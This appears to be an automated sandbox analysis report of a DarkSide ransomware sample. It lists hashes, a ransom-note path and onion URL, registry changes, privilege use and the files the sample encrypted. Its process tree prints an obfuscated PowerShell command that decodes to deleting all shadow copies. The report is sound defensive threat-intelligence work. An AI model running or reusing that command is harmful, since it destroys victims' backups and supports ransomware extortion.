Analysis
-
max time kernel
122s -
max time network
142s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
31-01-2022 05:59
Static task
static1
Behavioral task
behavioral1
Sample
0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
Resource
win10-en-20211208
General
-
Target
0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
-
Size
59KB
-
MD5
885fc8fb590b899c1db7b42fe83dddc3
-
SHA1
c104056f9a926d27a2082f0510c97b09cb0eb3e5
-
SHA256
0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d
-
SHA512
2b8e49ad84434dcaf98635120ac54bfa7e55bb61bf9d0e3f1f25ab81e950f638311d2121217bf5840834778d5e137551e24b89da02f12dc6be99d755c54f4c13
Malware Config
Extracted
C:\\README.5bede5a3.TXT
darkside
http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Modifies extensions of user files 19 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\GroupOut.png.5bede5a3 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe File renamed C:\Users\Admin\Pictures\SetRegister.raw => C:\Users\Admin\Pictures\SetRegister.raw.5bede5a3 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe File opened for modification C:\Users\Admin\Pictures\StartUndo.tiff 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe File renamed C:\Users\Admin\Pictures\StartUndo.tiff => C:\Users\Admin\Pictures\StartUndo.tiff.5bede5a3 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe File renamed C:\Users\Admin\Pictures\GroupOut.png => C:\Users\Admin\Pictures\GroupOut.png.5bede5a3 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe File opened for modification C:\Users\Admin\Pictures\InitializeSet.raw.5bede5a3 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe File opened for modification C:\Users\Admin\Pictures\MeasureDebug.tiff.5bede5a3 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe File opened for modification C:\Users\Admin\Pictures\SkipPing.tiff 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe File opened for modification C:\Users\Admin\Pictures\SkipPing.tiff.5bede5a3 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe File opened for modification C:\Users\Admin\Pictures\UndoRepair.raw.5bede5a3 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe File renamed C:\Users\Admin\Pictures\GrantAssert.crw => C:\Users\Admin\Pictures\GrantAssert.crw.5bede5a3 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe File renamed C:\Users\Admin\Pictures\InitializeSet.raw => C:\Users\Admin\Pictures\InitializeSet.raw.5bede5a3 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe File renamed C:\Users\Admin\Pictures\MeasureDebug.tiff => C:\Users\Admin\Pictures\MeasureDebug.tiff.5bede5a3 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe File opened for modification C:\Users\Admin\Pictures\SetRegister.raw.5bede5a3 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe File renamed C:\Users\Admin\Pictures\SkipPing.tiff => C:\Users\Admin\Pictures\SkipPing.tiff.5bede5a3 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe File renamed C:\Users\Admin\Pictures\UndoRepair.raw => C:\Users\Admin\Pictures\UndoRepair.raw.5bede5a3 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe File opened for modification C:\Users\Admin\Pictures\GrantAssert.crw.5bede5a3 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe File opened for modification C:\Users\Admin\Pictures\MeasureDebug.tiff 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe File opened for modification C:\Users\Admin\Pictures\StartUndo.tiff.5bede5a3 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\5bede5a3.BMP" 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\5bede5a3.BMP" 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe -
Modifies Control Panel 1 IoCs
Processes:
0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Control Panel\Desktop\WallpaperStyle = "10" 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe -
Modifies registry class 5 IoCs
Processes:
0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.5bede5a3\ = "5bede5a3" 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\5bede5a3\DefaultIcon 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\5bede5a3 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\5bede5a3\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\5bede5a3.ico" 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.5bede5a3 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exe0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exepid process 1404 powershell.exe 1580 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe 1580 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 1580 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe Token: SeSecurityPrivilege 1580 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe Token: SeTakeOwnershipPrivilege 1580 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe Token: SeLoadDriverPrivilege 1580 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe Token: SeSystemProfilePrivilege 1580 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe Token: SeSystemtimePrivilege 1580 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe Token: SeProfSingleProcessPrivilege 1580 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe Token: SeIncBasePriorityPrivilege 1580 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe Token: SeCreatePagefilePrivilege 1580 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe Token: SeBackupPrivilege 1580 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe Token: SeRestorePrivilege 1580 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe Token: SeShutdownPrivilege 1580 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe Token: SeDebugPrivilege 1580 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe Token: SeSystemEnvironmentPrivilege 1580 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe Token: SeRemoteShutdownPrivilege 1580 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe Token: SeUndockPrivilege 1580 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe Token: SeManageVolumePrivilege 1580 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe Token: 33 1580 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe Token: 34 1580 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe Token: 35 1580 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe Token: SeDebugPrivilege 1404 powershell.exe Token: SeBackupPrivilege 620 vssvc.exe Token: SeRestorePrivilege 620 vssvc.exe Token: SeAuditPrivilege 620 vssvc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exedescription pid process target process PID 1580 wrote to memory of 1404 1580 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe powershell.exe PID 1580 wrote to memory of 1404 1580 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe powershell.exe PID 1580 wrote to memory of 1404 1580 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe powershell.exe PID 1580 wrote to memory of 1404 1580 0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe"C:\Users\Admin\AppData\Local\Temp\0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe"1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1404
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:620
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
3b80d40a65e03e035cf76129c11559b9
SHA16a357bbb32fc88785a60ece81252cbd1920828a1
SHA256c61b7f0113737d5cb04c167555cfc664858200a6379c6a76ef7b8e17f9b10d52
SHA51275669dffe481137d0ed199522a352aab20b746b7c556a6f0e92aea58cf6e012824615672a76d68a94b5f6477bbe8ea2e83868e34269c841cc695b3f20eecc26d
-
memory/1404-55-0x000007FEFB571000-0x000007FEFB573000-memory.dmpFilesize
8KB
-
memory/1404-58-0x0000000002482000-0x0000000002484000-memory.dmpFilesize
8KB
-
memory/1404-59-0x0000000002484000-0x0000000002487000-memory.dmpFilesize
12KB
-
memory/1404-57-0x0000000002480000-0x0000000002482000-memory.dmpFilesize
8KB
-
memory/1404-56-0x000007FEF26A0000-0x000007FEF31FD000-memory.dmpFilesize
11.4MB
-
memory/1404-60-0x000000000248B000-0x00000000024AA000-memory.dmpFilesize
124KB
-
memory/1580-54-0x00000000754B1000-0x00000000754B3000-memory.dmpFilesize
8KB